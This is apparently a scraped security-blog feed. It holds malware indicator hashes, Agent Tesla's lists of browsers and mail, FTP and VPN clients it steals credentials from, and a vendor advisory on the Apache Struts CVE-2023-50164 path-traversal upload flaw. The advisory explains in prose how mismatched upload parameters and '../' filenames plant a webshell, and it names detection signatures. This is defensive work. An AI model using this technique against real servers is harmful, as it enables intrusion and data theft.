8a081a4f6c497c60c6e72dfabfe30326
ad0f5f4994a2998f0e1ed3323884837c
092ff92d9bfa9cac81a8b892d495f42e
09f197fc8d69ec14875723f1e6e623bf
0eba69a4ad399db14a2743b4d68f13e8
19eab6a97cea19473bda3010066c5990
cb2b5646d68279aea516703df3c4c1e9
3247ad04996dd2966800153e7ea14571
92d1ece422670dbf9a3e1aef45612b5c
f25da7cd5fb33e7a0967dbcdf008bd9a
a7f2d131a2f3f61978ec17395f7b34b1
39088a9e4ad3e7a8ba4686641569dbcd
210e9a89b723b3246a7d590c9a428c83
efc3a41ecae822eba861cb88c179c80e
c01e90db99bcc939f829a181aef2c348
b18ba839dfd653b07b984330dd85b57a
a8e8d4667f96ea847d18eb7830fb1dc6
c38b8d525f48cbdf92381274059d8f0b
6e0dafacdeee6f2d9463d0052db5cce8
b6f892c73fa0f491072592d7baf0c916
bf9d9c9a95fdb861c583dc9b66bcf5ab
0043f65755a700b94a57118a672df82c
adbf1e2f49d842aac524d7ac351ca5b4
d55bdb3593664d806794d00025390081
935e75cbd0f207bfeb6d3b5d90e35685
db4bfb57c7acd8d568a06a9c3739e146
08e1955de35005b335be2e100d2d4a3c
e57882623add29cbfa8c93d011b52c44
e6c4636c331af09568a68dcf3614cfa4
be71e90f09a38adfe22d34e3dd044fad
e9d4e5b8b80dcb4fcf5af8413066434e
413af1ff38e6a4e205c6f487d042b457
f1a1542bbccea9a4e6746040d85eae1b
05d60c7be299fc0220ffcaf3b1482652
5373b6dce20bbb0218034aa9bf0c20df
1e22cd428f5baf23877a8189469ed92a
b76d8d59b53f58dd876951044e6d88b9
a29585da474f79a723894c1a56f65b85
2639c8b09f744e95ba612c89ef26e02c
bba5761789159b5a1a23566506358c15
3d8414800762efb9276a999fc477211b
f0af137175487b4d1249921ce506efe9
2123f750f5b854b439349576118d9b9d
7b6ec969d4110722b427de45ca1c0d42
6dfc461ecf4f2fe4c5f44cdeb6792226
0708c52198a49bc7ab16bce19472598a
00b28f548f14de4f53abd6651bf78b98
ea1472bad426efded678a15c9a14bf34
dadb38b97d45d7438fbd43911a71d844
d7ebf4ab7bb0ab685e3902349d637e9b
aff1e141f15d808d5d4f549ea99c1e4d
bbc7c66b301d3087cfdaa89528832895
e6926fc50f40c5c5feb676b0adcb7655
3c3580dfbc1f06636fe5696879cbdd85
b7dba4e30a73f58740d316c46645b759
7b1bc15873c39866b429d44da8640285
Agent Tesla pilfers data from the following browsers:
Edge Chromium
Postbox
Iridium Browser
Elements Browser
Citrio, CentBrowser
Epic Privacy
SeaMonkey
Vivaldi
Yandex Browser
Amigo
7Star
Kometa
IceCat
Cool Novo
Flock
Coowon
360 Browser
Brave
WaterFox
Chromium
Liebao Browser
CyberFox
PaleMoon
Thunderbird
QIP Surf
Sleipnir 6
Sputnik
IceDragon
Coccoc
K-Meleon
Comodo Dragon
Chedot
Opera Browser
BlackHawk
Firefox
Torch Browser
Uran
Orbitum
Agent Tesla tries to steal credentials from the following mail and FTP clients:
Paltalk
WinSCP
Safari for Windows
FTP Navigator
Discord
Falkon Browser
Mailbird
QQ Browser
ClawsMail
Pidgin
Eudora
FTPGetter
Becky!
eM Client
IncrediMail
JDownloader 2.0
Psi/Psi+
FoxMail
FtpCommander
Flock Browser
FileZilla
Outlook
WS_FTP
OpenVPN
Private Internet Access
IE/Edge
SmartFTP
DynDns
Opera Mail
Trillian
CoreFTP
MysqlWorkbench
PocoMail
Flash
FXP
UC Browser
NordVPN
Internet Downloader Manager
Windows Mail App
Tue, 19 12月 2023 11:17:52 -0800Kaivalya Khursalehttps://www.zscaler.jp/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-teslaCoverage Advisory for CVE-2023-50164: Apache Struts Path Traversal and File Upload Vulnerability
https://www.zscaler.jp/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file
Introduction
On December 7, the Apache Software Foundation released Apache Struts versions 6.3.0.2 and 2.5.33 to address a critical vulnerability currently identified as CVE-2023-50164, which is a path traversal flaw allowing a malicious file to be uploaded and potentially lead to Remote Code Execution (RCE) on affected versions of Apache Struts.
Recommendations
Zscaler ThreatLabz recommends users on Apache Struts software upgrade to versions Struts 2.5.33, Struts 6.3.0.2, or higher to avoid this vulnerability.
Affected Versions
The following versions of Apache Struts are affected by the vulnerability and should update immediately:
Struts 2.0.0 - Struts 2.3.37 (EOL)
Struts 2.5.0 - Struts 2.5.32
Struts 6.0.0 - Struts 6.3.0
Background
CVE-2023-50164 is a path traversal flaw that allows a remote attacker to upload malicious files to vulnerable servers. After successful exploitation, an attacker can achieve Remote Code Execution (RCE) on the target server. An attacker exploiting such a vulnerability can access, upload, or modify important files, steal sensitive information, disrupt critical services, or move laterally on the breached network.
CISA released an alert to upgrade to the latest version of Apache Struts for protection from this vulnerability.
According to the Shadowserver scanning platform, some threat actors may have started exploiting publicly exposed vulnerable Apache Struts servers. In addition, a post by Akamai indicates that attackers may be adding new arguments and modifying a publicly available Proof-of-Concept (PoC) to further exploit CVE-2023-50164.
How It Works
The attacker accesses a vulnerable version of Apache Struts to send an HTTP POST request to upload a malicious file.
In the POST request, the attacker uploads a file with malicious content using the 'Upload' parameter name (instead of 'upload'). Within the same request, the attacker adds another parameter named 'uploadFileName' (instead of 'UploadFileName').
Figure 1 is a condensed example of a request.
Figure 1: Part of the HTTP POST request
The 'uploadFileName' parameter contains path traversal characters (../), which manipulate the filename present in the ‘Upload’ parameter, allowing an attacker to bypass the built-in check – effectively evading the getCanonicalName method (a method used to truncate '/' & '\' characters in the filename) — and leave the path traversal payload in the final filename. From here, the file (with the malicious payload) is uploaded to the attacker’s chosen directory.
If the file contains WebShell code, the attacker can escalate access to the vulnerable server, leading to RCE and ultimately gaining access to the target server.
Figure 2: Attack chain depicting an attacker exploiting CVE-2023-50164
Zscaler Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access™ with application security modules turned on.
Route all server traffic through Zscaler Private Access™ with additional application security module enabled and Zscaler Internet Access™, which provides visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection™ to block all known command-and-control domains — thereby adding another layer of protection if an attacker exploits this vulnerability to implant malware.
Extend command-and-control (C2) protection to all ports and protocols with the Zscaler Cloud Firewall™ (Cloud IPS module), including emerging C2 destinations. Doing so provides additional protection if the attacker exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox™ to prevent unknown malware from being delivered as part of a second-stage payload.
Inspect all TLS/SSL traffic and restrict traffic to the critical infrastructure from the allowed list of known-good destinations.
Conclusion
Addressing CVE-2023-50164 is crucial for protecting the digital security of Apache Struts systems and users. By manipulating file upload parameters, uploading malicious files, and achieving RCE on the target server, an attacker can take control — stealing sensitive information, leading to severe disruptions for impacted systems and users. To mitigate this risk, upgrade vulnerable Apache Struts software systems to Struts 2.5.33, Struts 6.3.0.2, or higher.
Zscaler Coverage
The Zscaler ThreatLabz team has deployed protection for the CVE.
Zscaler Advanced Threat Protection
HTML.EXPLOIT.CVE-2023-50164
Zscaler Private Access AppProtection
Local File Inclusion: 930100 - Path Traversal Attack (/../) - Encoded Payload
Local File Inclusion: 930110 - Path Traversal Attack (/../) - Decoded Payload
Details related to these signatures can be found in the Zscaler Threat Library.
References
https://lists.apache.org/thread/yh09b3fkf6vz5d6jdgrlvmg60lfwtqhj
https://www.cisa.gov/news-events/alerts/2023/12/12/apache-software-foundation-updates-struts-2
https://trganda.github.io/notes/security/vulnerabilities/apache-struts/Apache-Struts-Remote-Code-Execution-Vulnerability-%28-S2-066-CVE-2023-50164%29
https://thehackernews.com/2023/12/new-critical-rce-vulnerability.html
Mon, 18 12月 2023 08:55:37 -0800Nishant Guptahttps://www.zscaler.jp/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file